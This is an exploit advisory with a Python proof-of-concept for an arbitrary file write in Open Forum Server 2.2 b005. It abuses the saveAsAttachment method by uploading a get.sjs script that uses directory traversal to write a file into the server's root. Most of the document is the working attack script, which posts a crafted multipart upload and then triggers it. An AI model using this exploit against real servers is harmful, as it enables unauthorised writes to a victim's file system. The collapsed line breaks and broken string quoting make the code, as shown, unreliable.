openforumserver-write.txt
Posted on 25 May 2010
#============================================================================================================# # _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # # /_/ /\_ /\_ /\_ /\_ /\_______) ) ___ ( /_/\__/ ) ___ ( /_/ /\_ /\_____/_/\__/ # # ) ) )( ( ( /_/( ( ( ( ( ( (___ __// /\_/ ) ) ) ) )/ /\_/ ) ) )( ( (( (_____/) ) ) ) ) # # /_/ //\ \_ /\_\ \_ \_ / / / / /_/ (_ /_/ /_/ // /_/ (_ /_/ //\ \_\ \__ /_/ /_/_/ # # / / // / // / /__ / / /__ ( ( ( )_/ / / \_/ )_/ / / / / // /__/_ # # )_) / (_(( (_(( (_____(( (_____( /_/ / )_) ) /_/ / )_) / (_(( (_____)_) ) # # \_/ /_/ /_/ /_____/ /_____/ /_/_/ )_____( \_/ )_____( \_/ /_/ /_____/\_/ \_/ # # # #============================================================================================================# # # # Vulnerability............Arbitrary File Write # # Software.................Open Forum Server 2.2 b005 # # Download.................http://code.google.com/p/open-forum # # Date.....................5/23/10 # # # #============================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #============================================================================================================# # # # ##Description## # # # # An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be # # exploited to write to the local file system of the server. # # # # # # ##Exploit## # # # # Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder. # # # # # # ##Proof of Concept## # # # import sys, socket host = 'localhost' port = 80 def send_request(request): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(32) # sometimes it takes a while s.connect((host, port)) s.send(request) response = s.recv(8192) + s.recv(8192) # a hack within a hack return response def write_file(): try: content = '----x-- '\n'Content-Disposition: form-data; name="file"; filename="get.sjs" '\n'Content-Type: application/octet-stream '\n'fileName = "' + '..\\' * 256 + 'x.txt"; '\n'data = "hello, world"; '\n'user = transaction.getUser(); '\n'wiki.saveAsAttachment("x",fileName,data,user); '\n'transaction.sendPage("File Written"); '\n'----x---- ' response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1 ' 'Host: ' + host + ' ' 'Content-Type: multipart/form-data; boundary=--x-- ' 'Content-Length: ' + str(len(content)) + ' ' + content) if 'HTTP/1.1 302 Redirect' not in response: print 'Error writing get.sjs' return else: print 'get.sjs created' response = send_request('GET OpenForum HTTP/1.1 ' 'Host: ' + host + ' ') if 'File Written' not in response: print 'Error writing to root' return else: print 'x.txt created in root' except Exception: print sys.exc_info() write_file()
